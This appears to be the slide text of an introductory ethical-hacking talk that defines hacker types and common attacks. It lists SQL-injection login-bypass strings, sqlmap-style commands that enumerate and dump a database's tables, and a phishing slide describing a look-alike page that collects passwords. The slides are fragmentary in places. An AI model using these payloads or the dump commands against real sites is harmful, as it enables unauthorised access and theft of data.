Ethical Hacking

About me

S.H.M. Sameera Chathuranga Senior Software Engineer MSc (Stud.), BSc(Hons) Software Eng.(Java Tech.Special), SCJP, AJD,SCWCD Institute of Java and Technological Studies Software Department

Ethical Hacker
The definition of an Ethical Hacker is very similar to a Penetration Tester. The Ethical Hacker is an individual who is usually employed with the organization and who can be trusted to undertake an attempt to penetrate networks and/or computer systems using the same methods and techniques as a Hacker.

Types of hacker
I. White Hat II. Black Hat III. Grey Hat IV. Hacktivist V. Phreaker

White Hat
White hat has the skills to break into computer systems and do damage. However, they use their skills to help organizations. For example a white hat might work for an organization to test for security weaknesses and vulnerabilities in the network

Black Hat
Black Hat also known as a cracker uses his skills to break into computer systems for unethical reasons. For example, steal user data like, username and password, credit card numbers, bank information.

Grey Hat
This type can be thought of as a white hat attacker who sometimes acts unethically. They could be employed as a legit network security administrator. But, during this person's duties, he may find an opportunity for gaining access to company data and stealing that data.

Phreaker
A phreaker is simply a hacker of telecommunications. An example of this is tricking the phone system into letting you make free long distance calls.

Types of Hacking
SQL Injection SQL Mapping Social Engineering Denial of Service Sniffing Social Engineering Phishing Key loggers

SQL Injection
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. It uses normal SQL commands to get into database with elevated privileges.

Sniffing
Sniffing refers to the act of intercepting TCP packets. This interception can happen through simple eavesdropping or something more sinister.

Social Engineering
Online criminals can use sophisticated technology to try to gain access to your computer, or they can use something simpler and more insidious: social engineering. Social engineering is a way for criminals to gain access to your computer. The purpose of social engineering is usually to secretly install spyware or other malicious software or to trick you into handing over your passwords or other sensitive financial or personal information. Some online criminals find it easier to exploit human nature than to exploit holes in your software.

Denial of Service
DoS attacks give hackers a way to bring down a network without gaining internal access. DoS attacks work by flooding the access routers with bogus traffic(which can be e-mail or Transmission Control Protocol, TCP, packets).

Phishing
This is another type of keylogging, here you have to bring the user to a webpage created by you resembling the legitimate one and get him to enter his password, to get the same in your mail box..!! Use social engineering.

Virtual Matching Diagram

Working with Back Track Environment

Type this commands
sudo su xrandr xrandr s 1280 x 1024 (or your resolution)

SQL Injection
0'or'0'='0 admin'-' or 0=0 -" or 0=0 -or 0=0 -' or 0=0# " or 0=0# 'or 1=1# "or 1=1#

Magazines
www.Phrack.org www.hakin9.org www.2600.com

Hacking Forums
http://hackhound.org/forums/page /index.html https://www.hackthissite.org/ http://www.crackmes.de/ http://www.evilzone.org/ http://www.hack-tech.com/ http://www.binrev.com/forums/

python.py -u URL" --dbs

python.py -u URL" -D "database name" --tables

python.py -u URL" -T table_name --columns

python.py -u URL" -T table_name --dump

Thank you